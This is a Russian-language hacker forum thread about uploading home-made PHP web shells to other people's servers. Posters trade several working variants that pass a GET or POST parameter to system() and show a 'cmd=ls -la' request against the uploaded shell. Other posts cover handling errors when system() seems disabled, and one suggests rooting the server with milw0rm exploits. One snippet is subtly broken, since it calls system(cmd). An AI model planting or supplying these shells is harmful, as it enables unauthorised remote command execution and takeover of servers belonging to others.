Модерам: Извините, если я запостил данную тему не в этом разделе..., просто не знаю к чему её отнести...если, что перенесите.

Вот выношу на обсуждение интересную весчъ...
Частенько заливая самописный шелл на типа вот этого:
<?php
echo "<pre>";
system($_GET['cmd']);
echo "</pre>"
?> и обращаясь к нему по типу вот этого: _http://someserver.com/shell.php я получал ошибку,что мол
Warning!!! ла-ла ... функция system запрещена...
Но всё равно обратившись по ссылке _http://someserver.com/shell.php?cmd=ls -la получил листинг данной директори... и это был не единственный случай!!!
Мораль сей басни: сперва попробуйте выполнить команду, чем сразу к другим действиям...

думаю это не листинг, даже не includ,
А что же это, что за явление?))
Глупая тема, если хватило ума залить шелл, то тем более хватит проверить, что бы там не писалось.
Фтопку!

когда ты обращаешься по адрессу
http://someserver.com/shell.php
то ошибка происходит в строке
system($_GET['cmd']);
так как не определен параметр cmd
если ты будешь вызывать строку как
@system($_GET['cmd']);
то ошибки не будет.

Я конечно, не чего не хочу сказать, но сколько я видео не смотрел, когда заливают шелл, и вылетает такая муйня, то сразу переходят к другим методам...

переходят к другим методам, когда она действительна отключена.
а по твоему первому посту, этого не видно.

если ты будешь вызывать строку как
@system($_GET['cmd']);
то ошибки не будет.

ошибка будет, просто об этом не будет сообщения..
хотя чего эт я придираюсь, суть то одна)

юзаем
<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

?>
а лучше вообще пост, но это в идеале

а ещё добавим прелести, что б потом люди не пужалися, что чёт не работает... если конешн не для себя пишем ;)

<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

else {
echo 'не введены данные запроса';
exit;
}

?>

не спорю...
хотя на мой взгляд удобнее чем этот простого шелла нет...
<form method=post>
<input type=text name=cmd size=50>
<input type=submit value="Жми на пимпу">
</form>
<?php
echo "<pre>";
system(cmd);
echo "</pre>";
?> ....

так это через post
а я оставил вариант через get
)
эдак мы сейчас для удобства такого понапишем... ещё одинr57shell ;)

а чем ваше отличаеться system($_GET['cmd']); от system($cmd); прост скок смотрю каждый пишет по своему! а разница ваше какая?

первый будет работать и вызываться в любом месте, а второй может потеряться в функциях и т.д.

если у тебя шелл <? system(); ?> то тут пох как использовать

k1b0rg спасиб за справку!

а что делать если эти шеллы не выполняют команды nix ? в apache включен safe_mode и запрещены команды выполнения cmd (system() и тд)

Просто залить обычнй шелл,и посмотреть что там в дирах,если есть возможность,то рутать его.Милворм в помосчь